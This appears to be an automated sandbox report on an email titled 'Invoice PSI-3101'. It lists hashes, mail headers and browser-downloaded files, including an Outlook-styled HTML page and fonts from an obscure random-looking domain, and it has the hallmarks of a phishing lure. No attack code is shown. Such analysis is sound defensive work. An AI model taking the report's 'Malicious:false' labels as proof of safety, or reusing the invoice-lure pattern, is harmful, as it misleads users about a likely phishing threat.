                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28000
                                                    Entropy (8bit):7.99335735457429
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-bold.woff2
                                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3266)
                                                    Category:downloaded
                                                    Size (bytes):3271
                                                    Entropy (8bit):5.861743163666749
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:39127E354142C4173ACFB2D555CCF13C
                                                    SHA1:0D8DB511286080CA923DC893E2A232A211B8C746
                                                    SHA-256:C748FD50DB7E42DF460FC957CDC36032E7B8652E6E67B47807C5AE182D9F7B3D
                                                    SHA-512:1A727CCAABFADE318DAB9248ADA8F3588947AF28B218A28DFD578B8A5546BBB26066E64C406E9060C4B80A2EA477DF0C011A9832B5F6B3506EDC19608E4CB5F0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                    Preview:)]}'.["",["national burrito day free burritos","solo leveling season season 3","uconn huskies final four","nintendo switch games","h1b visa lottery results","nasa astronauts sunita williams","tesla stock","texas tcu basketball game"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wNzdtOTUSJlN1bml0YSBXaWxsaWFtcyDigJQgQW1lcmljYW4gYXN0cm9uYXV0Mr8MZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQUJCUUVCQUFBQUFBQUFBQUFBQUFBR0FRSURCQVVBQi8vRUFDNFFBQUlCQXdNQkJ3TUVBd0FBQUFBQUFBRUNBd0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28584
                                                    Entropy (8bit):7.992563951996154
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-regular.woff2
                                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):93276
                                                    Entropy (8bit):7.997636438159837
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/GDSherpa-vf2.woff2
                                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):150242
                                                    Entropy (8bit):5.9665821999152655
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DA0A71858E51F0A96A12D2418E1E327D
                                                    SHA1:15A6D602DD0B778135ABA684093C1A0221FE5988
                                                    SHA-256:17BA8B1C9201D06F311DEC62515F256D65E1635736FA57E1574FF79905DADCB0
                                                    SHA-512:A109198CBEC97DE940DCB6D1744C75641C4116A8B78B0651AA067CB6E42F9F9B48EAF526932EE72ED02F9F4B5801B00C6AF93795A8CFFAA8BE363F541C6926FE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJE
                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):268
                                                    Entropy (8bit):5.111190711619041
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:59759B80E24A89C8CD029B14700E646D
                                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/opbd95W8u6CyERvfeIzCVlbOCPMoyRjo9N26ghrmaenMpLyLV5leABdyw2N64Xeccd193
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                    File type:CDFV2 Microsoft Outlook Message
                                                    Entropy (8bit):6.145305945019944
                                                    TrID:
                                                    • Outlook Message (71009/1) 58.92%
                                                    • Outlook Form Template (41509/1) 34.44%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                    File name:Invoice PSI-3101.msg
                                                    File size:187'392 bytes
                                                    MD5:3536b4e8a81a8b0360570cebfee561cf
                                                    SHA1:922dec2abb38489b1cdb9929565be89d296650bc
                                                    SHA256:f5f9378dd4f77fabbd11ae6cba7a424ddfc4c5d085add7808db87c5960f42f93
                                                    SHA512:5aaf029dd55176d886da389e5878b79ed0e886ea9a9c9d86e836ed0e62e71859e3deede15b682e4175d213fcf7dee2a79d1675130dc1679e3e91703145a9dd6c
                                                    SSDEEP:3072:ZCZeVFRLNQ/xNx7Gr11l16qlSA2myxyoFmfh:4QRxQ/xAXlYqlNgyoF
                                                    TLSH:E604192539E44716F23ADBB18FE344A74B12FD56ED11679F2082334F0A31B51AC66B2E
                                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                                    Subject:Invoice PSI-3101
                                                    From:Postmaster <postmaster@highlandreeds.com>
                                                    To:Postmaster <postmaster@highlandreeds.com>
                                                    Cc:
                                                    BCC:
                                                    Date:Mon, 31 Mar 2025 23:48:30 +0200
                                                    Communications:
                                                    • Your Right to Disconnect: This email is being sent at a time that is convenient for me, should you receive it outside of your working hours please note there is no obligation to respond or take action outside of your normal working hours. --------------- This message (including attachments) may contain information that is privileged, confidential or protected from disclosure. If you are not the intended recipient, you are hereby notified that dissemination, disclosure, copying, distribution or use of this message or any information contained in it is strictly prohibited. If you have received this message in error, please immediately notify the sender by reply e-mail and delete this message from your computer. Although we have taken steps to ensure that this e-mail and attachments are free from any virus, we advise that in keeping with good computing practice the recipient should ensure they are actually virus free. ---------------
                                                    Attachments:
                                                    • image001.png
                                                    • image003.png
                                                    • image004.png
                                                    • Invoice PSI-3101.pdf
                                                    Key Value
                                                    Receivedfrom CWXP123MB2790.GBRP123.PROD.OUTLOOK.COM
                                                    2148:30 +0000
                                                    Authentication-Resultsdkim=none (message not signed)
                                                    by CWLP123MB2897.GBRP123.PROD.OUTLOOK.COM (260310a6:400:59::15) with
                                                    2025 2148:30 +0000
                                                    ([fe80:ba88:b699:4ee5:fe0e%7]) with mapi id 15.20.8534.048; Mon, 31 Mar 2025
                                                    Content-Typeapplication/ms-tnef; name="winmail.dat"
                                                    Content-Transfer-Encodingbinary
                                                    FromPostmaster <postmaster@highlandreeds.com>
                                                    ToPostmaster <postmaster@highlandreeds.com>
                                                    SubjectInvoice PSI-3101
                                                    Thread-TopicInvoice PSI-3101
                                                    Thread-IndexAQHbooakD2KUUMzD2ku0cW3gk3BS0g==
                                                    DateMon, 31 Mar 2025 21:48:30 +0000
                                                    Message-ID<CWXP123MB279055AEB08717EE431CE170DDAD2@CWXP123MB2790.GBRP123.PROD.OUTLOOK.COM>
                                                    References<DU0PR08MB929931E825D9ED26559A1B88BD9DA@DU0PR08MB9299.eurprd08.prod.outlook.com>
                                                    In-Reply-To<CWXP123MB27909719B4C7BC70ACC15D86DDDC2@CWXP123MB2790.GBRP123.PROD.OUTLOOK.COM>
                                                    Accept-Languageen-US
                                                    Content-Languageen-US
                                                    X-MS-Has-Attachyes
                                                    X-MS-Exchange-Organization-SCL1
                                                    X-MS-TNEF-Correlator<CWXP123MB279055AEB08717EE431CE170DDAD2@CWXP123MB2790.GBRP123.PROD.OUTLOOK.COM>
                                                    MIME-Version1.0
                                                    X-MS-Exchange-Organization-MessageDirectionalityOriginating
                                                    X-MS-Exchange-Organization-AuthSourceCWXP123MB2790.GBRP123.PROD.OUTLOOK.COM
                                                    X-MS-Exchange-Organization-AuthAsInternal
                                                    X-MS-Exchange-Organization-AuthMechanism04
                                                    X-MS-Exchange-Organization-Network-Message-Id0bfd4c45-b650-44a2-08a2-08dd709dc6bf
                                                    X-MS-PublicTrafficTypeEmail
                                                    X-MS-TrafficTypeDiagnosticCWXP123MB2790:EE_|CWLP123MB2897:EE_|CWXP123MB2790:EE_
                                                    Return-Pathpostmaster@highlandreeds.com
                                                    X-MS-Exchange-Organization-ExpirationStartTime31 Mar 2025 21:48:30.8420
                                                    X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                    X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                    X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                    X-MS-Office365-Filtering-Correlation-Id0bfd4c45-b650-44a2-08a2-08dd709dc6bf
                                                    X-Microsoft-AntispamBCL:0;ARA:13230040|366016|8096899003|3613699012|41050700001;
                                                    X-Forefront-Antispam-ReportCIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:CWXP123MB2790.GBRP123.PROD.OUTLOOK.COM;PTR:;CAT:NONE;SFS:(13230040)(366016)(8096899003)(3613699012)(41050700001);DIR:INT;
                                                    X-MS-Exchange-CrossTenant-OriginalArrivalTime31 Mar 2025 21:48:30.2919
                                                    X-MS-Exchange-CrossTenant-FromEntityHeaderHosted
                                                    X-MS-Exchange-CrossTenant-Id367d3172-dd9b-4fac-a669-c8c434c90cfd
                                                    X-MS-Exchange-CrossTenant-AuthSourceCWXP123MB2790.GBRP123.PROD.OUTLOOK.COM
                                                    X-MS-Exchange-CrossTenant-AuthAsInternal
                                                    X-MS-Exchange-CrossTenant-Network-Message-Id0bfd4c45-b650-44a2-08a2-08dd709dc6bf
                                                    X-MS-Exchange-CrossTenant-MailboxTypeHOSTED
                                                    X-MS-Exchange-CrossTenant-UserPrincipalNamea4U3WXoFEP8XkYVFEuKhaXiLBQfTMtBCrbTq+lyQ+ycW4Sz3pAdJIW8qlw8rdC4ADBCvpnws3nbKzUDgv8dRzCjthexpwIbs6uMhyOw3j7Q=
                                                    X-MS-Exchange-Transport-CrossTenantHeadersStampedCWLP123MB2897
                                                    X-MS-Exchange-Transport-EndToEndLatency00:00:02.5380811
                                                    X-MS-Exchange-Processed-By-BccFoldering15.20.8534.033
                                                    X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(920097)(425001)(930097)(140003);
                                                    X-Microsoft-Antispam-Message-InfoiOWHA2ctemf5p46ItsdPXWHurEsF/1GJYND6Qza4GYUGJArkeEJuNHKFJ/Kyix54YpmWN5Ga12VExtcvmd9lLOkENwVKAD7s4mceXu3W/+kaufkIEeCI8hm8zKLl0XcsHYWjY2J6JnfveEgv9gQPApziqzps9FMNlDkyPkiNZWrOCB28q1/9PNx6Ue87OdhGpToUX/c5XtIUXsJBcv60MokslfwKG43Fd9AUnUdCA4gY4XOCTWwp00SIKvbzy0i1KFiV36gWXN4IA1yoejwn4UF7lSCI+/Hc0fyG9XaT7sS+LvLrEItadnER7XXBrSNfPCRc5TH5daKiD2sCP7xPfexVsxpRIlvJdhu1BiQfE7nMRR24T4MobLliKWAq6E+XpADESwxfqrMXNMjtgQl9ZJilNh/L0dIe9TY/6cOtBxBWP/xQrkhOdfIQaKv1opc9G03uHw317TnX8CQjTP2PYflmTS6V0OXBOTXpRhhHOCaoZqZv7N1e4oI2O7q/tUq8Dh/9nn3EcQyX6LXNt4l9KeMBbQFd9BUql1qODkgLoyjU0tQY+HKr7uHXILn7CDzocdHE/2WCMZtlTvxpoqhRva9ouBf5DNOZ6ZbyYu3KhYQGA6uKXLtj1tSFoi+A1kQVHW2TTZZvcNCh1l/Zef3YSyTTHqvC8+FZR9HEpAYofjN7wao5C+KdVUhb1WNpjb4obqZSsHo1cN6vFohC6dLNlaxttCvN5yD1AinbR6rVT/xvdo46W/bdxCpban5qqTpkScXKKOinKD4xnXs3sniKU3if7ZX7IUCDf8Z9443DNlVywn/9EkoMbcUBcbBW02QT
                                                    dateMon, 31 Mar 2025 23:48:30 +0200

                                                    Icon Hash:c4e1928eacb280a2